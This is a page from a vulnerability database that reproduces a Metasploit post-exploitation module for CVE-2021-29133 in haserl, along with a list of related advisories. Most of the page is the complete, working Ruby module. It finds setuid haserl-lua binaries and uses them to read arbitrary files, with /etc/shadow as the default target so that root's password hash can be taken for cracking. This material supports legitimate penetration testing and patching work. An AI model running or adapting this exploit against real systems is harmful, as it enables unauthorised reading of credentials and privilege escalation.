Vulners
Lucene search
Haserl Arbitrary File Reader
🗓️ 09 Apr 2021 17:42:41Reported by Julien (jvoisin) Voisin, Ike BroflovskiType 
metasploit🔗 www.rapid7.com👁 51 Views
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | CVE-2021-29133 | 24 Mar 202106:32 | – | alpinelinux |
 | CVE-2021-29133 | 9 Apr 202111:17 | – | circl |
 | Alpine Linux 安全漏洞 | 24 Mar 202100:00 | – | cnnvd |
 | CVE-2021-29133 | 24 Mar 202106:32 | – | cve |
 | CVE-2021-29133 | 24 Mar 202106:32 | – | cvelist |
 | EUVD-2021-15774 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-29133 | 24 Mar 202107:15 | – | nvd |
 | openSUSE 15 Security Update : haserl (openSUSE-SU-2021:1279-1) | 17 Sep 202100:00 | – | nessus |
 | Security update for haserl (moderate) | 16 Sep 202100:00 | – | opensuse |
 | openSUSE: Security Advisory for haserl (openSUSE-SU-2021:1279-1) | 17 Sep 202100:00 | – | openvas |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Haserl Arbitrary File Reader',
'Description' => %q{
This module exploits haserl prior to 0.9.36 to read arbitrary files.
The most widely accepted exploitation vector is reading /etc/shadow,
which will reveal root's hash for cracking.
},
'License' => MSF_LICENSE,
'Author' => [
'Julien (jvoisin) Voisin', # metasploit module
'Ike Broflovski' # discovery
],
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' => [
['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
['URL', 'https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539'],
['CVE', '2021-29133']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options([
OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
])
end
def haserl_lua_paths
begin
files = get_suid_files('/usr/bin')
rescue StandardError
return
end
return unless files
return files.select { |f| File.basename(f).starts_with?('haserl-lua') }
end
def run
if is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges')
end
files = haserl_lua_paths
if files.nil? || files.empty?
fail_with(Failure::NotVulnerable, 'Could not find setuid haserl lua executable in /usr/bin/')
end
binary = files.first
print_good("Found set-uid haserl: #{binary}")
output = cmd_exec("#{binary} '#{datastore['RFILE']}'")
return if output.empty?
fname = File.basename(datastore['RFILE'].downcase)
p = store_loot(
"haserl_#{fname}",
'text/plain',
session,
output,
"haserl_#{fname}",
'haserl arbitrary read'
)
vprint_good("#{fname} saved in: #{p}")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2026 18:59Current
5.4Medium risk
Vulners AI Score5.4
CVSS 22.1
CVSS 3.15.5
EPSS0.01953